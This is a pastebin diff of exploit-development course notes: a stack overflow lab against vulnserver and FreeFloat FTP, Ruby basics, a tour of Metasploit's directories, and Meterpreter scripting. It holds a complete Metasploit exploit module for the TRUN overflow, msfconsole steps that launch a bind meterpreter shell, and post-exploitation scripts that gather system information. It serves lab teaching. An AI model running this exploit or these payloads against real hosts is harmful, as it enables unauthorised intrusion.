View difference between Paste ID: XNsyGMmW and iYE5rG0t
SHOW: | | - or go back to the newest paste.
1
########
2
# Tips #
3
########
4
https://ired.team/offensive-security/powershell-constrained-language-mode-bypass
5
6
7
8
#####################################
9
# Quick Stack Based Buffer Overflow #
10
#####################################
11
 
12
- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
13
http://45.63.104.73/ExploitLab.zip
14
http://45.63.104.73/nc-password-is-netcat.zip
15
http://45.63.104.73/1-SEH.zip
16
http://45.63.104.73/WarFTP.zip
17
http://45.63.104.73/SEH.zip
18
http://45.63.104.73/sws.zip
19
http://45.63.104.73/tftpd.zip
20
http://45.63.104.73/ffvlc.zip
21
http://45.63.104.73/pdf-exploit.zip
22
 
23
 
24
- Extract the ExploitLab.zip file to your Desktop
25
 
26
- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
27
 
28
- Open a new command prompt and type:
29
 
30
---------------------------Type This-----------------------------------
31
 
32
nc localhost 9999
33
--------------------------------------------------------------------------
34
 
35
- In the new command prompt window where you ran nc type:
36
HELP
37
 
38
- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
39
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
40
 
41
- Now double-click on 1-simplefuzzer.py
42
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
43
 
44
 
45
- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
46
 
47
- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
48
 
49
- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
50
 
51
- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
52
 
53
- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
54
 
55
- Calculate the distance to EIP by running script 3-3000chars.py
56
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
57
 
58
4-count-chars-to-EIP.py
59
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
60
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
61
 
62
5-2006char-eip-check.py
63
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
64
 
65
6-jmp-esp.py
66
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
67
 
68
7-first-exploit
69
- In this script we actually do the stack overflow and launch a bind shell on port 4444
70
 
71
8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
72
 
73
 
74
------------------------------
75
 
76
 
77
 
78
#########################################
79
# FreeFloat FTP Server Exploit Analysis #
80
#########################################
81
 
82
 
83
 
84
Analyze the following exploit code:
85
https://www.exploit-db.com/exploits/15689/
86
 
87
1. What is the target platform that this exploit works against?
88
2. What is the variable name for the distance to EIP?
89
3. What is the actual distance to EIP in bytes?
90
4. Describe what is happening in the variable ‘junk2’
91
 
92
 
93
 
94
 
95
Analysis of the training walk-through based on EID: 15689:
96
http://45.63.104.73/ff.zip
97
 
98
 
99
 
100
 
101
ff1.py
102
1. What does the sys module do? Call System Commands
103
2. What is sys.argv[1] and sys.argv[2]?
104
3. What application entry point is being attacked in this script?
105
 
106
 
107
 
108
ff2.py
109
1. Explain what is happening in lines 18 - 20 doing.
110
2. What pattern_create.rb doing and where can I find it?
111
3. Why can’t I just double click the file to run this script?
112
 
113
 
114
 
115
ff3.py
116
1. Explain what is happening in lines 17 - to 25?
117
2. Explain what is happening in lines 30 - to 32?
118
3. Why is everything below line 35 commented out?
119
 
120
 
121
 
122
ff4.py
123
1. Explain what is happening in lines 13 - to 15.
124
2. Explain what is happening in line 19.
125
3. What is the total length of buff?
126
 
127
 
128
 
129
Ff5.py
130
1. Explain what is happening in line 15.
131
2. What is struct.pack?
132
3. How big is the shellcode in this script?
133
 
134
 
135
 
136
ff6.py
137
1. What is the distance to EIP?
138
2. How big is the shellcode in this script?
139
3. What is the total byte length of the data being sent to this app?
140
 
141
 
142
 
143
 
144
ff7.py
145
1. What is a tuple in python?
146
2. How big is the shellcode in this script?
147
3. Did your app crash in from this script?
148
 
149
 
150
 
151
 
152
ff8.py
153
1. How big is the shellcode in this script?
154
2. What is try/except in python?
155
3. What is socket.SOCK_STREAM in Python?
156
 
157
 
158
 
159
ff9.py
160
1. What is going on in lines 19 and 20?
161
2. What is the length of the NOPs?
162
3. What is socket.SOCK_STREAM in Python?
163
 
164
 
165
 
166
 
167
ff010.py
168
1. What is going on in lines 18 - 20?
169
2. What is going on in lines 29 - 32?
170
3. How would a stack adjustment help this script?
171
172
173
Required review videos to watch tonight:
174
----------------------------------------
175
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
176
Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
177
178
Recommended (not required) videos to watch tonight:
179
---------------------------------------------------
180
For more background on Assembly I would recommend the following video series (videos 1-11):
181
https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
182
Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
183
184
185
186
---------------------------------------------------------------------------------------------------------------------############################
187
# Day 2: Ruby Fundamentals #
188
############################
189
 
190
 
191
 
192
- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
193
scientist and programmer from Japan. It is a cross-platform dynamic language.
194
 
195
- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
196
on Rails is a framework that is written in Ruby.
197
 
198
- Ruby's file name extensions are .rb and .rbw.
199
 
200
- official website of this
201
 
202
- language: www.ruby-lang.org.
203
 
204
 
205
- interactive Shell called Ruby Shell
206
 
207
- open up the interactive console and play around.
208
 
209
---------------------------Type This-----------------------------------
210
irb
211
-----------------------------------------------------------------------
212
 
213
 
214
- Math, Variables, Classes, Creating Objects and Inheritance
215
 
216
 
217
The following arithmetic operators:
218
    Addition operator (+) — 10 + 23
219
    Subtraction operator (-) — 1001 - 34
220
    Multiplication operator (*) — 5 * 5
221
    Division operator (/) — 12 / 2
222
 
223
 
224
 
225
- Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
226
operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
227
30. Again, 69 is assigned to y, and then y is incremented by 33.
228
 
229
---------------------------Type This-----------------------------------
230
x = 25
231
x + 30
232
y = 69
233
y+33
234
-----------------------------------------------------------------------
235
 
236
 
237
 
238
- Let's look at creating classes and creating objects.
239
 
240
- Here, the name of the class is Attack. An object has its properties and methods.
241
 
242
 
243
---------------------------Type This-----------------------------------
244
class Attack
245
attr_accessor :of, :sqli, :xss
246
end
247
-----------------------------------------------------------------------
248
 
249
 
250
What is nil?
251
Reference:
252
https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
253
 
254
nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
255
 
256
Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
257
 
258
To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
259
 
260
 
261
 
262
 
263
 
264
# Now that we have created the classes let's create the objects
265
---------------------------Type This-----------------------------------
266
first_attack = Attack.new
267
first_attack.of = "stack"
268
first_attack.sqli = "blind"
269
first_attack.xss = "dom"
270
puts first_attack.of
271
puts first_attack.sqli
272
puts first_attack.xss
273
-----------------------------------------------------------------------
274
 
275
 
276
 
277
 
278
- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
279
inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
280
one object can access the properties/attributes of another object of a different class. Inheritance makes your
281
programming life easier by maximizing code reuse.
282
 
283
 
284
---------------------------Type This-----------------------------------
285
class Exploitframeworks
286
attr_accessor :scanners, :exploits, :shellcode, :postmodules
287
end
288
class Metasploit < Exploitframeworks
289
end
290
class Canvas < Exploitframeworks
291
end
292
class Coreimpact < Exploitframeworks
293
end
294
class Saint < Exploitframeworks
295
end
296
class Exploitpack < Exploitframeworks
297
end
298
-----------------------------------------------------------------------
299
 
300
 
301
 
302
 
303
- Methods, More Objects, Arguments, String Functions and Expression Shortcuts
304
 
305
- Let's create a simple method. A method is used to perform an action and is generally called with an object.
306
 
307
- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
308
it will print this string: "We are Learning how to PenTest"
309
 
310
- An object named 'bo' is created, which is used to call the method.
311
 
312
 
313
---------------------------Type This-----------------------------------
314
class Msfnl
315
def learning
316
puts "We are Learning how to PenTest"
317
end
318
end
319
-----------------------------------------------------------------------
320
 
321
#Now let's define an object for our Method
322
 
323
---------------------------Type This-----------------------------------
324
joe = Msfnl.new
325
joe.learning
326
-----------------------------------------------------------------------
327
 
328
 
329
 
330
- An argument is a value or variable that is passed to the function while calling it. In the following example, while
331
calling the puts() function, we are sending a string value to the function. This string value is used by the
332
function to perform some particular operations.
333
 
334
puts ("Pentesting")
335
 
336
 
337
- There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
338
explain some useful string functions with an example.
339
 
340
- The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
341
reverse function reverses a string. The following example demonstrates how to use the string functions.
342
 
343
---------------------------Type This-----------------------------------
344
55.class
345
"I Love Programming".class
346
"I Love Pentesting".length
347
"Pown that box".upcase
348
"Love" + "To Root Boxes"
349
"evil".reverse
350
"evil".reverse.upcase
351
-----------------------------------------------------------------------
352
 
353
 
354
-  expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand,  '=' is
355
an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
356
examples of some expressions.
357
 
358
---------------------------Type This-----------------------------------
359
a = 3
360
b = 6
361
a+b+20
362
d = 44
363
f = d
364
puts f
365
-----------------------------------------------------------------------
366
 
367
 
368
 
369
 
370
 
371
- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
372
assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
373
statements to understand the shortcuts.
374
 
375
---------------------------Type This-----------------------------------
376
g = 70
377
g = g+44
378
g += 33
379
-----------------------------------------------------------------------
380
 
381
 
382
- In the above statement, g is incremented by 33 and then the total value is assigned to g.
383
 
384
 
385
 
386
---------------------------Type This-----------------------------------
387
g *= 3
388
-----------------------------------------------------------------------
389
 
390
 
391
- In the above statement, g is multiplied with 3 and then assigned to g.
392
 
393
- Example
394
 
395
- Comparison Operators, Loops, Data Types, and Constants
396
 
397
- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
398
how to use the following comparison operators.
399
 
400
'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
401
variable or constant. If it's less than the other, the 'less than' operator returns true.
402
 
403
'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
404
or constant. If it's equal to the other, the 'equal to' operator returns true.
405
 
406
'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
407
variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
408
 
409
---------------------------Type This-----------------------------------
410
numberofports = 55
411
puts "number of ports found during scan" if numberofports < 300
412
numberofports = 400
413
puts "number of ports found during scan" if numberofports < 300
414
puts "number of ports found during scan" if numberofports == 300
415
puts "number of ports found during scan" if numberofports != 300
416
-----------------------------------------------------------------------
417
 
418
 
419
 
420
Example
421
 
422
 
423
- the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
424
 
425
- This operator is generally used to combine multiple conditions.
426
- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
427
 
428
- following example to understand how this operator works.
429
 
430
---------------------------Type This-----------------------------------
431
ports = 100
432
puts "number of ports found on the network" if ports<100 || ports>200
433
puts "number of ports found on the network" if ports<100 || ports>75
434
-----------------------------------------------------------------------
435
 
436
# unless
437
 
438
---------------------------Type This-----------------------------------
439
portsbelow1024 = 50
440
puts "If the ports are below 1024" unless portsbelow1024 < 1000
441
puts "If the ports are below 1024" unless portsbelow1024 < 1055
442
puts "If the ports are below 1024" unless portsbelow1024 < 20
443
-----------------------------------------------------------------------
444
 
445
- The 'unless' keyword is used to do something programmatically unless a condition is true.
446
 
447
 
448
 
449
- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
450
 
451
- See the following example to understand how a string is printed 10 times on the screen using a loop.
452
 
453
---------------------------Type This-----------------------------------
454
10.times do puts "infosecaddicts" end
455
-----------------------------------------------------------------------
456
 
457
# Or use the curly braces
458
 
459
---------------------------Type This-----------------------------------
460
10.times {puts "infosecaddicts"}
461
-----------------------------------------------------------------------
462
 
463
 
464
- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
465
working with different data types. Data type conversion is also known as type casting.
466
 
467
 
468
 
469
- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
470
change the value of a constant, you will see a warning message.
471
 
472
 
473
 
474
 
475
- Multiple Line String Variable, Interpolation, and Regular Expressions
476
 
477
- A multiple line string variable lets you assign the value to the string variable through multiple lines.
478
 
479
---------------------------Type This-----------------------------------
480
infosecaddicts = <<mark
481
welcome
482
to the
483
best
484
metasploit
485
course
486
on the
487
market
488
mark
489
puts infosecaddicts
490
-----------------------------------------------------------------------
491
 
492
 
493
- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
494
it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
495
Examine the following example to understand how interpolation works in Ruby.
496
 
497
References:
498
https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
499
 
500
 
501
---------------------------Type This-----------------------------------
502
a = 4
503
b = 6
504
puts "a * b = a*b"
505
puts " #{a} * #{b} = #{a*b} "
506
person = "Joe McCray"
507
puts "IT Security consultant person"
508
puts "IT Security consultant #{person}"
509
-----------------------------------------------------------------------
510
 
511
- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
512
 
513
 
514
 
515
 
516
 
517
- Character classes
518
---------------------------Type This-----------------------------------
519
infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
520
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
521
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
522
-----------------------------------------------------------------------
523
 
524
 
525
- Arrays, Push and Pop, and Hashes
526
 
527
 
528
- In the following example, numbers is an array that holds 6 integer numbers.
529
 
530
 
531
---------------------------Type This-----------------------------------
532
numbers = [2,4,6,8,10,100]
533
puts numbers[0]
534
puts numbers[4]
535
numbers[2] = 150
536
puts numbers
537
-----------------------------------------------------------------------
538
 
539
 
540
 
541
- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
542
 
543
 
544
---------------------------Type This-----------------------------------
545
framework = []
546
framework << "modules"
547
framework << "exploits"
548
framework << "payloads"
549
framework.pop
550
framework.shift
551
-----------------------------------------------------------------------
552
 
553
- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
554
that is used to access the element.
555
 
556
 
557
- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
558
In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
559
respective values: 'what module should you use', 'Windows XP' and 'SSH'.
560
 
561
---------------------------Type This-----------------------------------
562
metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
563
print metasploit.size
564
print metasploit["microsoft"]
565
metasploit['microsoft'] = 'redhat'
566
print metasploit['microsoft']
567
-----------------------------------------------------------------------
568
 
569
 
570
 
571
- Writing Ruby Scripts
572
 
573
 
574
- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
575
this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
576
someone made to look for a specific port. The port that it is looking for is port 21 FTP.
577
---------------------------Type This-----------------------------------
578
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
579
ls
580
-----------------------------------------------------------------------
581
 
582
 
583
 
584
###########################
585
# Metasploit Fundamentals #
586
###########################
587
 
588
- Let's take a little look at Metasploit Framework
589
 
590
- First, we should take note of the different directories, the Modular Architecture.
591
 
592
The modules that make up the Modular Architecture are
593
Exploits
594
Auxiliary
595
Payload
596
Encoder
597
Nops
598
 
599
 
600
Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
601
 
602
are
603-
cd ~/toolz/metasploit
603+
604
Modules
605
Scripts
606
Plugins
607
External
608
Data
609
Tools
610
 
611-
cd ~/toolz/metasploit/modules
611+
612
---------------------------Type This-----------------------------------
613
cd /usr/share/metasploit-framework
614
ls
615
-----------------------------------------------------------------------
616
 
617
 
618
 
619
- Now let's take a look inside the Modules directory and see what's there.
620
---------------------------Type This-----------------------------------
621
cd /usr/share/metasploit-framework/modules
622
ls
623
-----------------------------------------------------------------------
624-
cd ~/toolz/metasploit/external
624+
625
       
626
The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
627
not necessarily need to - have a shell or session started on a machine.
628
 
629
The exploits directory has our modules that we need to pop a shell on a box.
630-
cd ~/toolz/metasploit/data
630+
631
like Burp Suite
632
- Let's take a look at the external directory
633
---------------------------Type This-----------------------------------
634
cd /usr/share/metasploit-framework/external
635
ls
636
-----------------------------------------------------------------------
637-
cd ~/toolz/metasploit/data/wordlists
637+
638
- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
639
---------------------------Type This-----------------------------------
640
cd /usr/share/metasploit-framework/data
641
ls
642
-----------------------------------------------------------------------
643
 
644-
cd ~/toolz/metasploit/data/meterpreter
644+
645
brute-forcing
646
---------------------------Type This-----------------------------------
647
cd /usr/share/metasploit-framework/data/wordlists
648
ls
649
-----------------------------------------------------------------------
650
 
651
- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
652
once a session is created.
653
---------------------------Type This-----------------------------------
654
cd /usr/share/metasploit-framework/data/meterpreter
655
ls
656
-----------------------------------------------------------------------
657
 
658
- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
659
like escalating privileges and dumping hashes.
660
 
661
These are being phased out, though, and post-exploitation modules are what is being more preferred.
662
The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
663-
cd ~/toolz/metasploit/modules/exploits
663+
664
for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
665
custom shellcode.
666
 
667
The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
668
to do with other programs to make things like importing and exporting reports simple.
669
Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
670
the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
671
modules we're going to have a better understanding of where everything needs to go.
672
---------------------------Type This-----------------------------------
673
cd /usr/share/metasploit-framework/modules/exploits
674
ls
675-
cd ~/toolz/metasploit/modules/auxiliary/
675+
676
 
677
 
678
- The exploits directory is split up into several different directories, each one housing exploits for different types
679
of systems. I.E. Windows, Unix, OSX, dialup and so on.
680
Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
681
into categories of different types of services/programs, so that you can pick out an exploit specifically for the
682-
cd ~/toolz/metasploit/modules/auxiliary/scanner/
682+
683
for us.
684
---------------------------Type This-----------------------------------
685
cd /usr/share/metasploit-framework/modules/auxiliary/
686
ls
687
-----------------------------------------------------------------------      
688
 
689
 
690
- And a little further into the directory, let's take a look at what's in the scanner directory
691
---------------------------Type This-----------------------------------
692
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/
693
ls
694
-----------------------------------------------------------------------
695
 
696
 
697
- And one more folder deeper into the structure, let's take a look in the portscan folder
698
---------------------------Type This-----------------------------------
699
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
700
ls
701
-----------------------------------------------------------------------    
702
 
703
- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
704
and report them back to us in a nice, easily readable format.
705-
cd ~/toolz/metasploit/modules/payloads/
705+
706
cat tcp.rb
707
   
708
 
709
 
710
- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
711
once you have a session on a machine.
712
Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
713
succeeds.
714
---------------------------Type This-----------------------------------
715
cd /usr/share/metasploit-framework/modules/payloads/
716
ls
717
-----------------------------------------------------------------------    
718
 
719
 
720
- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
721
application for it to be used as.
722
Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
723
do everything once you have that shell calling back to you.
724
Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
725
the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
726
much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
727
to download Stages payloads.
728
 
729
 
730
- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
731
shells.
732
---------------------------Type This-----------------------------------
733
cd singles
734
cd windows
735
ls
736
-----------------------------------------------------------------------
737
 
738
 
739
- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
740
see what it actually does.
741
---------------------------Type This-----------------------------------
742
cat adduser.rb
743
-----------------------------------------------------------------------
744
 
745
Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
746
the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
747
it gives Windows to add the user to the system.
748
 
749
 
750
- Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
751
 
752
windows/shell/bind_tcp or windows/shell/reverse_tcp
753
---------------------------Type This-----------------------------------
754
cd ../../stagers
755
ls
756
-----------------------------------------------------------------------
757
   
758
 
759
 
760
- Again, we can see that we have stagers for multiple systems and code types.
761
---------------------------Type This-----------------------------------
762
ls windows/
763
-----------------------------------------------------------------------    
764
 
765
 
766
As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
767
machine, so we can upload or download our stage payloads and execute commands.
768
Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
769
our stagers...
770
---------------------------Type This-----------------------------------
771
cd ../stages
772
ls
773
-----------------------------------------------------------------------    
774
 
775
 
776
Again, we can see that our stages are coded for particular operating systems and languages.
777
We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
778
victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
779
if any.
780
 
781
- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
782
already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
783
so we can impersonate other users on the system in hopes of elevating our privileges.
784
---------------------------Type This-----------------------------------
785
cd ../../../post/
786
ls
787
cd windows/
788
ls
789
-----------------------------------------------------------------------    
790
 
791
 
792
Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
793
the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
794
escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
795
possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
796
memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
797
 
798
------------------------------
799
 
800
 
801
 
802
 
803
------------------------------------------
804-
cd ~/toolz/metasploit/modules/exploits/windows/misc
804+
805
------------------------------------------
806
 
807
 
808
 
809
 
810
 
811
 
812
---------------------------Type This-----------------------------------
813
 
814
cd /usr/share/metasploit-framework/modules/exploits/windows/misc
815-
# ~/toolz/metasploit/modules/exploits/windows/misc
815+
816
nano vulnserv.rb    
817
-------(paste the code below into this file)-------
818
#
819
#
820-
	include Msf::Exploit::Remote::Tcp
820+
821-
	def initialize(info = {})
821+
822-
		super(update_info(info,
822+
823-
			'Name'           => 'Custom vulnerable server stack overflow',
823+
824-
			'Description'    => %q{
824+
825-
				This module exploits a stack overflow in an app called 
825+
# /usr/share/metasploit-framework/modules/exploits/windows/misc
826-
				vulnserver that is designed to teach simple exploitation.
826+
827-
				},
827+
828-
			'Author'         => [ 'Joe McCray' ],
828+
829-
			'DefaultOptions' =>
829+
830-
				{
830+
    include Msf::Exploit::Remote::Tcp
831-
					'EXITFUNC' => 'process',
831+
    def initialize(info = {})
832-
				},
832+
        super(update_info(info,
833-
			'Payload'        =>
833+
            'Name'           => 'Custom vulnerable server stack overflow',
834-
				{
834+
            'Description'    => %q{
835-
					'Space'    => 800,
835+
                This module exploits a stack overflow in an app called
836-
					'BadChars' => "\x00\x20",
836+
                vulnserver that is designed to teach simple exploitation.
837-
				},
837+
                },
838-
			'Platform'       => 'win',
838+
            'Author'         => [ 'Joe McCray' ],
839
            'DefaultOptions' =>
840-
			'Targets'        =>
840+
                {
841-
				[
841+
                    'EXITFUNC' => 'process',
842-
					[
842+
                },
843-
						'Windows XP SP3 EN',
843+
            'Payload'        =>
844-
							{ 
844+
                {
845-
								'Ret' => 0x625011AF, 
845+
                    'Space'    => 800,
846-
							} 
846+
                    'BadChars' => "\x00\x20",
847-
					],
847+
                },
848-
				],
848+
            'Platform'       => 'win',
849-
			'DefaultTarget' => 0,
849+
850
            'Targets'        =>
851-
			'Privileged'     => false
851+
                [
852-
			))
852+
                    [
853
                        'Windows XP SP3 EN',
854-
			register_options(
854+
                            {
855-
			[
855+
                                'Ret' => 0x625011AF,
856-
				Opt::RPORT(9999)
856+
                            }
857-
			], self.class)
857+
                    ],
858-
	end
858+
                ],
859
            'DefaultTarget' => 0,
860-
	def exploit
860+
861-
		connect
861+
            'Privileged'     => false
862-
		sock.recv(1024)
862+
            ))
863
 
864-
		p =  "\x41" * 16
864+
            register_options(
865-
		p << payload.encoded
865+
            [
866
                Opt::RPORT(9999)
867-
		hdr =  "TRUN ."
867+
            ], self.class)
868-
		boom = pattern_create(3000)
868+
    end
869-
		boom[2006, 4] = [target.ret].pack('V')	# EIP value
869+
870-
		boom[2010, p.length] = p
870+
    def exploit
871
        connect
872-
		sploit = hdr + boom
872+
        sock.recv(1024)
873
 
874-
		sock.put(sploit)
874+
        p =  "\x41" * 16
875
        p << payload.encoded
876-
		handler
876+
877-
		disconnect
877+
        hdr =  "TRUN ."
878
        boom = pattern_create(3000)
879-
	end
879+
        boom[2006, 4] = [target.ret].pack('V')  # EIP value
880
        boom[2010, p.length] = p
881
 
882-
------------------end of copy/paste content -------------- 
882+
        sploit = hdr + boom
883
 
884
        sock.put(sploit)
885
 
886
        handler
887-
cd ~/toolz/metasploit
887+
        disconnect
888
 
889
    end
890
 
891
end
892
------------------end of copy/paste content --------------
893
 
894
 
895
 
896
---------------------------Type This-----------------------------------
897
cd /usr/share/metasploit-framework
898
 
899
./msfconsole
900
 
901
 
902
 
903
use exploit/windows/misc/vulnserv
904
set PAYLOAD windows/meterpreter/bind_tcp
905
set RHOST CHANGEME-TO-YOUR-WIN7-IP
906
set RPORT 9999
907
exploit
908
-----------------------------------------------------------------------
909
910
911
912
913
914
########################################
915
# Down and dirty Meterpreter Scripting #
916
########################################
917
918
-----------------------------------------------------------------------
919
- In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
920
 
921
can offer.  This will also show you the flexibility of the Meterpreter scripts.
922
 
923
- We're going to start off with a simple Hello World script first.  
924
925
- Keep your meterpreter shell open from the previous lab exercises, and in a new Linux command window type the following: 
926
---------------------------Type This-----------------------------------  
927
echo 'print_status("Hello World")' > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
928
-----------------------------------------------------------------------
929
 
930
- This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
931
 
932
- Lets test out our helloworld.rb Meterpreter script.
933
 
934
---------------------------Type This-----------------------------------
935
meterpreter> run helloworld
936
----------------------------------------------------------------------- 
937
 
938
- So far so good, now we can build on this base.  Lets add a couple more API calls to the script.
939
 
940
- Open /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb in your favorite and add following
941
 
942
line.
943
---------------------------Type This-----------------------------------
944
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
945
-------(paste the code below into this file)-------
946
print_error("this is an error!")
947
print_line("this is a line")
948
-----------------------------------------------------------------------
949
950
 
951
- Now run the script:
952
 
953
meterpreter> run helloworld
954
 
955
 
956
- Now that we have the basics down, we're going to do something a little more exciting.  
957
- The architecture to follow when creating these scripts goes as follows:
958
 
959
def getinfo(session)
960
        begin
961-
    cd /home/strategicsec/toolz/metasploit/
961+
            <stuff goes here>
962-
    ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
962+
        rescue ::Exception => e
963
            <stuff goes here>
964
        end
965
end
966
 
967
-----------------------------------------------------------------------
968
969
970
971
- Copy and paste the following code into our helloworld.rb script:
972
---------------------------Type This-----------------------------------
973
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
974
-------(paste the code below into this file)-------
975
def getinfo(session)
976
    begin
977
       sysnfo = session.sys.config.sysinfo
978
       runpriv = session.sys.config.getuid
979
       print_status("Getting system information ...")
980
       print_status("The target machine OS is #{sysnfo['OS']}")
981
       print_status("The computer name is #{'Computer'} ")
982
       print_status("Script running as #{runpriv}")
983
    rescue ::Exception => e
984
      print_error("The following error was encountered #{e}")
985
   end
986
end
987
 
988
getinfo(client)
989
--------------------------------------------------------------------------
990
 
991
 
992
- Now run the script:
993
---------------------------Type This-----------------------------------
994
meterpreter> run helloworld
995
----------------------------------------------------------------------- 
996
 
997
- We can expand it by adding actual system commands to the script, lets look at how we can do this.
998
---------------------------Type This-----------------------------------
999
vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
1000
-------(paste the code below into this file)-------
1001
def list_exec(session,cmdlst)
1002
    print_status("Running Command List ...")
